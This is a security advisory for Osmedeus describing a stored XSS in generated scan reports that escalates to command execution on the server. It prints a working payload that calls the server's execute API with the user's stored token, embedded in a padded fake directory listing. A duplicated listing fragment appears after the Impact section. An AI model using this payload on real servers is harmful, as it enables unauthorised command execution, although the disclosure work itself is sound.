Headline
GHSA-wvv7-wm5v-w2gv: Osmedeus Web Server Vulnerable to Stored XSS, Leading to RCE
Summary
XSS occurs on the Osmedeus web server when viewing results from the workflow, allowing commands to be executed on the server.
Details
When a workflow contains the summary module, Osmedeus generates reports in HTML and Markdown formats. The default report is based on the general-template.md template.
<p align="center">
<a href="https://www.osmedeus.org"><img alt="Osmedeus" src="https://raw.githubusercontent.com/osmedeus/assets/main/logo-transparent.png" height="140" /></a>
<br />
<br />
<strong>Execute Summary Generated by Osmedeus {{Version}} at <em>{{CurrentDay}}</em></strong>
<p align="center">
<a href="https://docs.osmedeus.org/"><img src="https://img.shields.io/badge/Documentation-0078D4?style=for-the-badge&logo=GitBook&logoColor=39ff14&labelColor=black&color=black"></a>
<a href="https://docs.osmedeus.org/donation/"><img src="https://img.shields.io/badge/Donation-0078D4?style=for-the-badge&logo=GitHub-Sponsors&logoColor=39ff14&labelColor=black&color=black"></a>
<a href="https://twitter.com/OsmedeusEngine"><img src="https://img.shields.io/badge/%40OsmedeusEngine-0078D4?style=for-the-badge&logo=Twitter&logoColor=39ff14&labelColor=black&color=black"></a>
</p>
</p>
## Scan Information
<scanInfo />
***
## 🚀 Subdomains
<content src="{{Output}}/subdomain/final-{{Workspace}}.txt" shorten=true />
***
## 🌐 HTTP Fingerprint
<content src="{{Output}}/fingerprint/beautify-{{Workspace}}-http.txt" />
***
## 🐞 Vulnerability
### List of Vulnerability Reports
- [**{{Workspace}}-report.html**]({{Output}}/vuln/active/{{Workspace}}-report.html)
- [**{{Workspace}}-sensitive.html**]({{Output}}/vuln/sensitive/{{Workspace}}-sensitive.html)
- [**{{Workspace}}-nuclei.html**]({{Output}}/vuln/nuclei/{{Workspace}}-nuclei.html)
### Jaeles Scan
<content src="{{Output}}/vuln/active/jaeles-summary.txt" />
<content src="{{Output}}/vuln/sensitive/jaeles-summary.txt" />
***
### Nuclei Scan
<content src="{{Output}}/vuln/nuclei/{{Workspace}}-nuclei-scan.txt" />
***
## 🕷️ Spider Content
<content src="{{Output}}/linkfinding/links-{{Workspace}}.txt"/>
***
## 📃 Content Discovery
<content src="{{Output}}/directory/unique-beautify-{{Workspace}}.txt" />
***
## 🔍 Port Scan
<content src="{{Output}}/portscan/open-ports.txt" />
***
The contents of the files are read and used to generate the report. However, the file contents are not properly filtered, leading to XSS. The issue starts with the processing of the <content> tags, and XSS occurs when the extendTag function is called.
https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L36
https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L95
https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L114
https://github.com/j3ssie/osmedeus/blob/815c261d44f6df1183d77b0b264060eec3168f00/core/markdown.go#L122-L124
To enter this if branch, one of the following conditions must be met:
- Tag shorten=true: In the default template, only subdomains have this tag ⇒ Subdomains cannot contain special characters, so XSS is not possible.
- len(fileContent) > r.Opt.MDCodeBlockLimit: Simply put, the content length needs to exceed the MDCodeBlockLimit configuration (default is 10,000).
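The branch condition and its effect, as an added Go example (a simplified model, not Osmedeus's own code). The `<pre>` wrapper, the function names and the constructed spider output are assumptions; only the shorten / MDCodeBlockLimit condition and the alert(1) marker come from the advisory.

```go
package main

import (
	"fmt"
	"html"
	"strings"
)

// mdCodeBlockLimit mirrors the default MDCodeBlockLimit (10,000) quoted in the advisory.
const mdCodeBlockLimit = 10000

// takesRawHTMLBranch reproduces the branch condition described above:
// either the tag carries shorten=true or the file exceeds the limit.
func takesRawHTMLBranch(fileContent string, shorten bool, limit int) bool {
	return shorten || len(fileContent) > limit
}

// renderUnsafe models the flawed pattern: tool output is concatenated into
// HTML verbatim. The <pre> wrapper is an assumption for illustration.
func renderUnsafe(fileContent string) string {
	return "<pre>" + fileContent + "</pre>"
}

// renderEscaped is the hardened form: untrusted tool output is HTML-escaped
// before it is placed in the report.
func renderEscaped(fileContent string) string {
	return "<pre>" + html.EscapeString(fileContent) + "</pre>"
}

// hasLiveScriptTag is a coarse check that a rendered fragment still contains
// an unescaped script element.
func hasLiveScriptTag(rendered string) bool {
	return strings.Contains(strings.ToLower(rendered), "<script")
}

// buildSpiderOutput constructs sample spider output (not real scan data):
// padLines ordinary URLs followed by one URL carrying the alert(1) marker.
func buildSpiderOutput(padLines int) string {
	var b strings.Builder
	for i := 0; i < padLines; i++ {
		fmt.Fprintf(&b, "http://target.example/test%d.php\n", i)
	}
	b.WriteString("http://target.example/?abc=<script>alert(1)</script>\n")
	return b.String()
}

func main() {
	for _, n := range []int{5, 400} {
		content := buildSpiderOutput(n)
		raw := takesRawHTMLBranch(content, false, mdCodeBlockLimit)
		fmt.Printf("lines=%d bytes=%d rawHTMLBranch=%v\n", n+1, len(content), raw)
		if raw {
			fmt.Println("  unescaped -> live <script>:", hasLiveScriptTag(renderUnsafe(content)))
			fmt.Println("  escaped   -> live <script>:", hasLiveScriptTag(renderEscaped(content)))
		}
	}
}
```

The shorten=true path needs the same escaping: in the default template it is safe only because subdomain names cannot carry markup.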
After reviewing the files loaded in the default template, we select Spider Content because it meets the conditions:
- It can contain special characters since the spider retrieves results through Katana ⇒ Katana parses content based on <a> tags ⇒ We can create custom payloads by leveraging this mechanism.
<!-- Fake Index Content -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Directory listing for /</title>
</head>
<body>
<h1>Directory listing for /</h1>
<hr>
<ul>
<li><a href="1">1</a></li>
<li><a href="?abc=<script>alert(1)</script>">yxfzssjq_1721182234998.pdf</a></li>
</ul>
<hr>
</body>
</html>
- The condition len(fileContent) > r.Opt.MDCodeBlockLimit is easy to satisfy
- Spider is a module within the general workflow ⇒ a default workflow that is most commonly used
PoC
https://drive.google.com/file/d/1u-YowfzFV1tUqLaZk4s4Y1DykFhJZ8gR/view?usp=sharing
Payload RCE
<script>fetch(window.location.origin+'/api/osmp/execute',{method:'POST',body:JSON.stringify({command:'echo 1 >/tmp/js.txt',password:''}),headers:{Authorization:'Osmedeus '+localStorage.jwt,'Content-Type':'application/json'}});</script>
File index payload
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Directory listing for /</title>
</head>
<body>
<h1>Directory listing for /</h1>
<hr>
<ul>
<li><a href="1">1</a></li>
<li><a href="675559605-1278d133b090b74129f65f6d108d2c83.pdf">675559605-1278d133b090b74129f65f6d108d2c83.pdf</a></li>
<li><a href="959f770895133edc4cf65a4a02d12da8-syncbreezeent_setup_v10.0.28.exe">959f770895133edc4cf65a4a02d12da8-syncbreezeent_setup_v10.0.28.exe</a></li>
<li><a href="%5BMS-DOCX%5D-240416.docx">[MS-DOCX]-240416.docx</a></li>
<li><a href="AnyDesk.exe">AnyDesk.exe</a></li>
<li><a href="Attachment.zip">Attachment.zip</a></li>
<li><a href="barker.tar">barker.tar</a></li>
<li><a href="c1awptpm_1721182413858.pdf">c1awptpm_1721182413858.pdf</a></li>
<li><a href="cacert.der">cacert.der</a></li>
<li><a href="caido-desktop-logs-1729480323.zip">caido-desktop-logs-1729480323.zip</a></li>
<li><a href="caido-desktop-v0.41.0-win-x86_64.exe">caido-desktop-v0.41.0-win-x86_64.exe</a></li>
<li><a href="caido-desktop-v0.42.0-win-x86_64.exe">caido-desktop-v0.42.0-win-x86_64.exe</a></li>
<li><a href="cdd">cdd</a></li>
<li><a href="CentOS-7-live-GNOME-x86_64.iso">CentOS-7-live-GNOME-x86_64.iso</a></li>
<li><a href="chrome-integrate.zip">chrome-integrate.zip</a></li>
<li><a href="ChromeSetup.exe">ChromeSetup.exe</a></li>
<li><a href="Code_of_Conduct_Company_All-Consultants_v23_2023.01.12.pdf">Code_of_Conduct_Company_All-Consultants_v23_2023.01.12.pdf</a></li>
<li><a href="CxSAST.950.Release.Setup_9.5.0.100.7z">CxSAST.950.Release.Setup_9.5.0.100.7z</a></li>
<li><a href="C%C3%81C%20QUY%20%C4%90%E1%BB%8ANH%20%26%20TI%C3%8AU%20CHU%E1%BA%A8N%20C%E1%BA%A6N%20BI%E1%BA%BET%20CHO%20DOANH%20NGHI%E1%BB%86P%20NH%E1%BB%B0A%20XU%E1%BA%A4T%20KH%E1%BA%A8U%20V%C3%80O%20EU.pdf">CÁC QUY ĐỊNH & TIÊU CHUẨN CẦN BIẾT CHO DOANH NGHIỆP NHỰA XUẤT KHẨU VÀO EU.pdf</a></li>
<li><a href="Danh%20sach%20may%20chu%20T18.xlsx">Danh sach may chu T18.xlsx</a></li>
<li><a href="de4dot-net45.zip">de4dot-net45.zip</a></li>
<li><a href="de4dot-netcoreapp3.1.zip">de4dot-netcoreapp3.1.zip</a></li>
<li><a href="desktop.ini">desktop.ini</a></li>
<li><a href="disk-1.KkwpoIcO.vmdk.part">disk-1.KkwpoIcO.vmdk.part</a></li>
<li><a href="disk-1.vmdk">disk-1.vmdk</a></li>
<li><a href="dist.zip">dist.zip</a></li>
<li><a href="dnSpy-net-win64.zip">dnSpy-net-win64.zip</a></li>
<li><a href="doc.9.1.0.rar">doc.9.1.0.rar</a></li>
<li><a href="download">download</a></li>
<li><a href="Earned_Achievements_2024-09-16.pdf">Earned_Achievements_2024-09-16.pdf</a></li>
<li><a href="Eazfuscator.NET%202024.1%20Setup.msi">Eazfuscator.NET 2024.1 Setup.msi</a></li>
<li><a href="flare-ida-master.zip">flare-ida-master.zip</a></li>
<li><a href="gitlab-recovery-codes.txt">gitlab-recovery-codes.txt</a></li>
<li><a href="Hacking%20Rust.pdf">Hacking Rust.pdf</a></li>
<li><a href="Huong%20dan%20cai%20dat%20Oracle%20New.docx">Huong dan cai dat Oracle New.docx</a></li>
<li><a href="ida83_sdk_tools_v2.zip">ida83_sdk_tools_v2.zip</a></li>
<li><a href="ida84_sdk_tools.zip">ida84_sdk_tools.zip</a></li>
<li><a href="IDARustDemangler.py">IDARustDemangler.py</a></li>
<li><a href="idb2pat.py">idb2pat.py</a></li>
<li><a href="incident-notification_26.03.2024-2.pdf">incident-notification_26.03.2024-2.pdf</a></li>
<li><a href="ironword.2024.8.3.nupkg">ironword.2024.8.3.nupkg</a></li>
<li><a href="KCSC_Recruitment.pdf">KCSC_Recruitment.pdf</a></li>
<li><a href="K%E1%BA%BF%20ho%E1%BA%A1ch%20%C4%91%C3%A0o%20t%E1%BA%A1o%2005102023%20%282%29.xlsx">Kế hoạch đào tạo 05102023 (2).xlsx</a></li>
<li><a href="linkfinder.json">linkfinder.json</a></li>
<li><a href="Margherita%20Report%20Demo_report.pdf">Margherita Report Demo_report.pdf</a></li>
<li><a href="Mastering_Malware_Analysis.pdf">Mastering_Malware_Analysis.pdf</a></li>
<li><a href="M%E1%BA%ABu-Danh%20sach%20Quan%20ly%20Backup-CS_v1.xlsx">Mẫu-Danh sach Quan ly Backup-CS_v1.xlsx</a></li>
<li><a href="node-v20.17.0-x64.msi">node-v20.17.0-x64.msi</a></li>
<li><a href="OpenJDK21U-jdk_x64_windows_hotspot_21.0.4_7.zip">OpenJDK21U-jdk_x64_windows_hotspot_21.0.4_7.zip</a></li>
<li><a href="OSED%20Notes%20Study%20Overview%20by%20Joas%20Antonio.pdf">OSED Notes Study Overview by Joas Antonio.pdf</a></li>
<li><a href="PAKD%20paytech.xlsx">PAKD paytech.xlsx</a></li>
<li><a href="password">password</a></li>
<li><a href="patriotctf.rar">patriotctf.rar</a></li>
<li><a href="pestudio-9.59.zip">pestudio-9.59.zip</a></li>
<li><a href="photo_2023-01-04_09-04-52.jpg">photo_2023-01-04_09-04-52.jpg</a></li>
<li><a href="photo_2023-01-04_09-04-55%20%282%29.jpg">photo_2023-01-04_09-04-55 (2).jpg</a></li>
<li><a href="photo_2023-01-04_09-04-55.jpg">photo_2023-01-04_09-04-55.jpg</a></li>
<li><a href="photo_2024-09-27_09-47-55.jpg">photo_2024-09-27_09-47-55.jpg</a></li>
<li><a href="Ph%E1%BB%A5%20l%E1%BB%A5c%205.xlsx">Phụ lục 5.xlsx</a></li>
<li><a href="plugin.zip">plugin.zip</a></li>
<li><a href="processhacker-2.39-setup.exe">processhacker-2.39-setup.exe</a></li>
<li><a href="publications.pdf">publications.pdf</a></li>
<li><a href="pwnfox.json">pwnfox.json</a></li>
<li><a href="pykd_ext_2.0.0.25.zip">pykd_ext_2.0.0.25.zip</a></li>
<li><a href="rp-win.zip">rp-win.zip</a></li>
<li><a href="rs.zip">rs.zip</a></li>
<li><a href="rustup-init.exe">rustup-init.exe</a></li>
<li><a href="setup.exe">setup.exe</a></li>
<li><a href="Single%20Page%20Applications%20with%20Vue.js.rar">Single Page Applications with Vue.js.rar</a></li>
<li><a href="Skilled_Person_Registration_Template_2pWPpnl.xlsx">Skilled_Person_Registration_Template_2pWPpnl.xlsx</a></li>
<li><a href="snapshot_2024-10-03_12-14.zip">snapshot_2024-10-03_12-14.zip</a></li>
<li><a href="spire.doc.12.7.3.nupkg">spire.doc.12.7.3.nupkg</a></li>
<li><a href="spire.doc.9.1.0.nupkg">spire.doc.9.1.0.nupkg</a></li>
<li><a href="spire.doc.cpp.11.4.5.nupkg">spire.doc.cpp.11.4.5.nupkg</a></li>
<li><a href="sticker.webm">sticker.webm</a></li>
<li><a href="Telegram%20Desktop/">Telegram Desktop/</a></li>
<li><a href="test">test</a></li>
<li><a href="test.php">test.php</a></li>
<li><a href="test2">test2</a></li>
<li><a href="test1.php">test1.php</a></li>
<li><a href="test2.php">test2.php</a></li>
<li><a href="test3.php">test3.php</a></li>
<li><a href="test4.php">test4.php</a></li>
<li><a href="test5.php">test5.php</a></li>
<li><a href="test6.php">test6.php</a></li>
<li><a href="test7.php">test7.php</a></li>
<li><a href="test8.php">test8.php</a></li>
<li><a href="test9.php">test9.php</a></li>
<li><a href="test10.php">test10.php</a></li>
<li><a href="test11.php">test11.php</a></li>
<li><a href="test12.php">test12.php</a></li>
<li><a href="test13.php">test13.php</a></li>
<li><a href="test14.php">test14.php</a></li>
<li><a href="test15.php">test15.php</a></li>
<li><a href="test16.php">test16.php</a></li>
<li><a href="test17.php">test17.php</a></li>
<li><a href="test18.php">test18.php</a></li>
<li><a href="test19.php">test19.php</a></li>
<li><a href="test20.php">test20.php</a></li>
<li><a href="test21.php">test21.php</a></li>
<li><a href="test22.php">test22.php</a></li>
<li><a href="test23.php">test23.php</a></li>
<li><a href="test24.php">test24.php</a></li>
<li><a href="test25.php">test25.php</a></li>
<li><a href="test26.php">test26.php</a></li>
<li><a href="test27.php">test27.php</a></li>
<li><a href="test28.php">test28.php</a></li>
<li><a href="test29.php">test29.php</a></li>
<li><a href="test30.php">test30.php</a></li>
<li><a href="test31.php">test31.php</a></li>
<li><a href="test32.php">test32.php</a></li>
<li><a href="test33.php">test33.php</a></li>
<li><a href="test34.php">test34.php</a></li>
<li><a href="test35.php">test35.php</a></li>
<li><a href="test36.php">test36.php</a></li>
<li><a href="test37.php">test37.php</a></li>
<li><a href="test38.php">test38.php</a></li>
<li><a href="test39.php">test39.php</a></li>
<li><a href="test40.php">test40.php</a></li>
<li><a href="test41.php">test41.php</a></li>
<li><a href="test42.php">test42.php</a></li>
<li><a href="test43.php">test43.php</a></li>
<li><a href="test44.php">test44.php</a></li>
<li><a href="test45.php">test45.php</a></li>
<li><a href="test46.php">test46.php</a></li>
<li><a href="test47.php">test47.php</a></li>
<li><a href="test48.php">test48.php</a></li>
<li><a href="test49.php">test49.php</a></li>
<li><a href="test50.php">test50.php</a></li>
<li><a href="test51.php">test51.php</a></li>
<li><a href="test52.php">test52.php</a></li>
<li><a href="test53.php">test53.php</a></li>
<li><a href="test54.php">test54.php</a></li>
<li><a href="test55.php">test55.php</a></li>
<li><a href="test56.php">test56.php</a></li>
<li><a href="test57.php">test57.php</a></li>
<li><a href="test58.php">test58.php</a></li>
<li><a href="test59.php">test59.php</a></li>
<li><a href="test60.php">test60.php</a></li>
<li><a href="test61.php">test61.php</a></li>
<li><a href="test62.php">test62.php</a></li>
<li><a href="test63.php">test63.php</a></li>
<li><a href="test64.php">test64.php</a></li>
<li><a href="test65.php">test65.php</a></li>
<li><a href="test66.php">test66.php</a></li>
<li><a href="test67.php">test67.php</a></li>
<li><a href="test68.php">test68.php</a></li>
<li><a href="test69.php">test69.php</a></li>
<li><a href="test70.php">test70.php</a></li>
<li><a href="test71.php">test71.php</a></li>
<li><a href="test72.php">test72.php</a></li>
<li><a href="test73.php">test73.php</a></li>
<li><a href="test74.php">test74.php</a></li>
<li><a href="test75.php">test75.php</a></li>
<li><a href="test76.php">test76.php</a></li>
<li><a href="test77.php">test77.php</a></li>
<li><a href="test78.php">test78.php</a></li>
<li><a href="test79.php">test79.php</a></li>
<li><a href="test80.php">test80.php</a></li>
<li><a href="test81.php">test81.php</a></li>
<li><a href="test82.php">test82.php</a></li>
<li><a href="test83.php">test83.php</a></li>
<li><a href="test84.php">test84.php</a></li>
<li><a href="test85.php">test85.php</a></li>
<li><a href="test86.php">test86.php</a></li>
<li><a href="test87.php">test87.php</a></li>
<li><a href="test88.php">test88.php</a></li>
<li><a href="test89.php">test89.php</a></li>
<li><a href="test90.php">test90.php</a></li>
<li><a href="test91.php">test91.php</a></li>
<li><a href="test92.php">test92.php</a></li>
<li><a href="test93.php">test93.php</a></li>
<li><a href="test94.php">test94.php</a></li>
<li><a href="test95.php">test95.php</a></li>
<li><a href="test96.php">test96.php</a></li>
<li><a href="test97.php">test97.php</a></li>
<li><a href="test98.php">test98.php</a></li>
<li><a href="test99.php">test99.php</a></li>
<li><a href="test100.php">test100.php</a></li>
<li><a href="test101.php">test101.php</a></li>
<li><a href="test102.php">test102.php</a></li>
<li><a href="test103.php">test103.php</a></li>
<li><a href="test104.php">test104.php</a></li>
<li><a href="test105.php">test105.php</a></li>
<li><a href="test106.php">test106.php</a></li>
<li><a href="test107.php">test107.php</a></li>
<li><a href="test108.php">test108.php</a></li>
<li><a href="test109.php">test109.php</a></li>
<li><a href="test110.php">test110.php</a></li>
<li><a href="test111.php">test111.php</a></li>
<li><a href="test112.php">test112.php</a></li>
<li><a href="test113.php">test113.php</a></li>
<li><a href="test114.php">test114.php</a></li>
<li><a href="test115.php">test115.php</a></li>
<li><a href="test116.php">test116.php</a></li>
<li><a href="test117.php">test117.php</a></li>
<li><a href="test118.php">test118.php</a></li>
<li><a href="test119.php">test119.php</a></li>
<li><a href="test120.php">test120.php</a></li>
<li><a href="test121.php">test121.php</a></li>
<li><a href="test122.php">test122.php</a></li>
<li><a href="test123.php">test123.php</a></li>
<li><a href="test124.php">test124.php</a></li>
<li><a href="test125.php">test125.php</a></li>
<li><a href="test126.php">test126.php</a></li>
<li><a href="test127.php">test127.php</a></li>
<li><a href="test128.php">test128.php</a></li>
<li><a href="test129.php">test129.php</a></li>
<li><a href="test130.php">test130.php</a></li>
<li><a href="test131.php">test131.php</a></li>
<li><a href="test132.php">test132.php</a></li>
<li><a href="test133.php">test133.php</a></li>
<li><a href="test134.php">test134.php</a></li>
<li><a href="test135.php">test135.php</a></li>
<li><a href="test136.php">test136.php</a></li>
<li><a href="test137.php">test137.php</a></li>
<li><a href="test138.php">test138.php</a></li>
<li><a href="test139.php">test139.php</a></li>
<li><a href="test140.php">test140.php</a></li>
<li><a href="test141.php">test141.php</a></li>
<li><a href="test142.php">test142.php</a></li>
<li><a href="test143.php">test143.php</a></li>
<li><a href="test144.php">test144.php</a></li>
<li><a href="test145.php">test145.php</a></li>
<li><a href="test146.php">test146.php</a></li>
<li><a href="test147.php">test147.php</a></li>
<li><a href="test148.php">test148.php</a></li>
<li><a href="test149.php">test149.php</a></li>
<li><a href="test150.php">test150.php</a></li>
<li><a href="test151.php">test151.php</a></li>
<li><a href="test152.php">test152.php</a></li>
<li><a href="test153.php">test153.php</a></li>
<li><a href="test154.php">test154.php</a></li>
<li><a href="test155.php">test155.php</a></li>
<li><a href="test156.php">test156.php</a></li>
<li><a href="test157.php">test157.php</a></li>
<li><a href="test158.php">test158.php</a></li>
<li><a href="test159.php">test159.php</a></li>
<li><a href="test160.php">test160.php</a></li>
<li><a href="test161.php">test161.php</a></li>
<li><a href="test162.php">test162.php</a></li>
<li><a href="test163.php">test163.php</a></li>
<li><a href="test164.php">test164.php</a></li>
<li><a href="test165.php">test165.php</a></li>
<li><a href="test166.php">test166.php</a></li>
<li><a href="test167.php">test167.php</a></li>
<li><a href="test168.php">test168.php</a></li>
<li><a href="test169.php">test169.php</a></li>
<li><a href="test170.php">test170.php</a></li>
<li><a href="test171.php">test171.php</a></li>
<li><a href="test172.php">test172.php</a></li>
<li><a href="test173.php">test173.php</a></li>
<li><a href="test174.php">test174.php</a></li>
<li><a href="test175.php">test175.php</a></li>
<li><a href="test176.php">test176.php</a></li>
<li><a href="test177.php">test177.php</a></li>
<li><a href="test178.php">test178.php</a></li>
<li><a href="test179.php">test179.php</a></li>
<li><a href="test180.php">test180.php</a></li>
<li><a href="test181.php">test181.php</a></li>
<li><a href="test182.php">test182.php</a></li>
<li><a href="test183.php">test183.php</a></li>
<li><a href="test184.php">test184.php</a></li>
<li><a href="test185.php">test185.php</a></li>
<li><a href="test186.php">test186.php</a></li>
<li><a href="test187.php">test187.php</a></li>
<li><a href="test188.php">test188.php</a></li>
<li><a href="test189.php">test189.php</a></li>
<li><a href="test190.php">test190.php</a></li>
<li><a href="test191.php">test191.php</a></li>
<li><a href="test192.php">test192.php</a></li>
<li><a href="test193.php">test193.php</a></li>
<li><a href="test194.php">test194.php</a></li>
<li><a href="test195.php">test195.php</a></li>
<li><a href="test196.php">test196.php</a></li>
<li><a href="test197.php">test197.php</a></li>
<li><a href="test198.php">test198.php</a></li>
<li><a href="test199.php">test199.php</a></li>
<li><a href="test200.php">test200.php</a></li>
<li><a href="test201.php">test201.php</a></li>
<li><a href="test202.php">test202.php</a></li>
<li><a href="test203.php">test203.php</a></li>
<li><a href="test204.php">test204.php</a></li>
<li><a href="test205.php">test205.php</a></li>
<li><a href="test206.php">test206.php</a></li>
<li><a href="test207.php">test207.php</a></li>
<li><a href="test208.php">test208.php</a></li>
<li><a href="test209.php">test209.php</a></li>
<li><a href="test210.php">test210.php</a></li>
<li><a href="test211.php">test211.php</a></li>
<li><a href="test212.php">test212.php</a></li>
<li><a href="test213.php">test213.php</a></li>
<li><a href="test214.php">test214.php</a></li>
<li><a href="test215.php">test215.php</a></li>
<li><a href="test216.php">test216.php</a></li>
<li><a href="test217.php">test217.php</a></li>
<li><a href="test218.php">test218.php</a></li>
<li><a href="test219.php">test219.php</a></li>
<li><a href="test220.php">test220.php</a></li>
<li><a href="test221.php">test221.php</a></li>
<li><a href="test222.php">test222.php</a></li>
<li><a href="test223.php">test223.php</a></li>
<li><a href="test224.php">test224.php</a></li>
<li><a href="test225.php">test225.php</a></li>
<li><a href="test226.php">test226.php</a></li>
<li><a href="test227.php">test227.php</a></li>
<li><a href="test228.php">test228.php</a></li>
<li><a href="test229.php">test229.php</a></li>
<li><a href="test230.php">test230.php</a></li>
<li><a href="test231.php">test231.php</a></li>
<li><a href="test232.php">test232.php</a></li>
<li><a href="test233.php">test233.php</a></li>
<li><a href="test234.php">test234.php</a></li>
<li><a href="test235.php">test235.php</a></li>
<li><a href="test236.php">test236.php</a></li>
<li><a href="test237.php">test237.php</a></li>
<li><a href="test238.php">test238.php</a></li>
<li><a href="test239.php">test239.php</a></li>
<li><a href="test240.php">test240.php</a></li>
<li><a href="test241.php">test241.php</a></li>
<li><a href="test242.php">test242.php</a></li>
<li><a href="test243.php">test243.php</a></li>
<li><a href="test244.php">test244.php</a></li>
<li><a href="test245.php">test245.php</a></li>
<li><a href="test246.php">test246.php</a></li>
<li><a href="test247.php">test247.php</a></li>
<li><a href="test248.php">test248.php</a></li>
<li><a href="test249.php">test249.php</a></li>
<li><a href="test250.php">test250.php</a></li>
<li><a href="test251.php">test251.php</a></li>
<li><a href="test252.php">test252.php</a></li>
<li><a href="test253.php">test253.php</a></li>
<li><a href="test254.php">test254.php</a></li>
<li><a href="test255.php">test255.php</a></li>
<li><a href="test256.php">test256.php</a></li>
<li><a href="test257.php">test257.php</a></li>
<li><a href="test258.php">test258.php</a></li>
<li><a href="test259.php">test259.php</a></li>
<li><a href="test260.php">test260.php</a></li>
<li><a href="test261.php">test261.php</a></li>
<li><a href="test262.php">test262.php</a></li>
<li><a href="test263.php">test263.php</a></li>
<li><a href="test264.php">test264.php</a></li>
<li><a href="test265.php">test265.php</a></li>
<li><a href="test266.php">test266.php</a></li>
<li><a href="test267.php">test267.php</a></li>
<li><a href="test268.php">test268.php</a></li>
<li><a href="test269.php">test269.php</a></li>
<li><a href="test270.php">test270.php</a></li>
<li><a href="test271.php">test271.php</a></li>
<li><a href="test272.php">test272.php</a></li>
<li><a href="test273.php">test273.php</a></li>
<li><a href="test274.php">test274.php</a></li>
<li><a href="test275.php">test275.php</a></li>
<li><a href="test276.php">test276.php</a></li>
<li><a href="test277.php">test277.php</a></li>
<li><a href="test278.php">test278.php</a></li>
<li><a href="test279.php">test279.php</a></li>
<li><a href="test280.php">test280.php</a></li>
<li><a href="test281.php">test281.php</a></li>
<li><a href="test282.php">test282.php</a></li>
<li><a href="test283.php">test283.php</a></li>
<li><a href="test284.php">test284.php</a></li>
<li><a href="test285.php">test285.php</a></li>
<li><a href="test286.php">test286.php</a></li>
<li><a href="test287.php">test287.php</a></li>
<li><a href="test288.php">test288.php</a></li>
<li><a href="test289.php">test289.php</a></li>
<li><a href="test290.php">test290.php</a></li>
<li><a href="test291.php">test291.php</a></li>
<li><a href="test292.php">test292.php</a></li>
<li><a href="test293.php">test293.php</a></li>
<li><a href="test294.php">test294.php</a></li>
<li><a href="test295.php">test295.php</a></li>
<li><a href="test296.php">test296.php</a></li>
<li><a href="test297.php">test297.php</a></li>
<li><a href="test298.php">test298.php</a></li>
<li><a href="test299.php">test299.php</a></li>
<li><a href="test300.php">test300.php</a></li>
<li><a href="The.IDA.Pro.Book.2nd.Edition.Jun.2011.pdf">The.IDA.Pro.Book.2nd.Edition.Jun.2011.pdf</a></li>
<li><a href="ThuHo.rar">ThuHo.rar</a></li>
<li><a href="Vue.js%20Master%20Class%202024%20Edition.rar">Vue.js Master Class 2024 Edition.rar</a></li>
<li><a href="VueSchool%20-%20The%20Vue.js%203%20Masterclass%20%282024-4%29.rar">VueSchool - The Vue.js 3 Masterclass (2024-4).rar</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir/">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir/</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part1.rar">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part1.rar</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part2.rar">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part2.rar</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part3.rar">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part3.rar</a></li>
<li><a href="Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part4.rar">Vueschool_The_Vue.js_3_Masterclass_2021-11_Downloadly.ir.part4.rar</a></li>
<li><a href="win%20server%202016%281%29.ovf">win server 2016(1).ovf</a></li>
<li><a href="win%20server%202016.ovf">win server 2016.ovf</a></li>
<li><a href="?abc=<script>fetch(window.location.origin+'/api/osmp/execute',{method:'POST',body:JSON.stringify({command:'echo 1 >/tmp/js.txt',password:''}),headers:{Authorization:'Osmedeus '+localStorage.jwt,'Content-Type':'application/json'}});</script>">yxfzssjq_1721182234998.pdf</a></li>
</ul>
<hr>
</body>
</html>
Impact
Command execution on the server.
<li><a href="idb2pat.py">idb2pat.py</a></li>
<li><a href="incident-notification_26.03.2024-2.pdf">incident-notification_26.03.2024-2.pdf</a></li>
<li><a href="ironword.2024.8.3.nupkg">ironword.2024.8.3.nupkg</a></li>
<li><a href="KCSC_Recruitment.pdf">KCSC_Recruitment.pdf</a></li>
<li><a href="K%E1%BA%BF%20ho%E1%BA%A1ch%20%C4%91%C3%A0o%20t%E1%BA%A1o%2005102023%20%282%29.xlsx">Kế hoạch đào tạo 05102023 (2).xlsx</a></li>
<li><a href="linkfinder.json">linkfinder.json</a></li>
<li><a href="Margherita%20Report%20Demo_report.pdf">Margherita Report Demo_report.pdf</a></li>
<li><a href="Mastering_Malware_Analysis.pdf">Mastering_Malware_Analysis.pdf</a></li>
<li><a href="M%E1%BA%ABu-Danh%20sach%20Quan%20ly%20Backup-CS_v1.xlsx">Mẫu-Danh sach Quan ly Backup-CS_v1.xlsx</a></li>
<li><a href="node-v20.17.0-x64.msi">node-v20.17.0-x64.msi</a></li>
<li><a href="OpenJDK21U-jdk_x64_windows_hotspot_21.0.4_7.zip">OpenJDK21U-jdk_x64_windows_hotspot_21.0.4_7.zip</a></li>
<li><a href="OSED%20Notes%20Study%20Overview%20by%20Joas%20Antonio.pdf">OSED Notes Study Overview by Joas Antonio.pdf</a></li>
<li><a href="PAKD%20paytech.xlsx">PAKD paytech.xlsx</a></li>
<li><a href="password">password</a></li>
<li><a href="patriotctf.rar">patriotctf.rar</a></li>
<li><a href="pestudio-9.59.zip">pestudio-9.59.zip</a></li>
<li><a href="photo_2023-01-04_09-04-52.jpg">photo_2023-01-04_09-04-52.jpg</a></li>
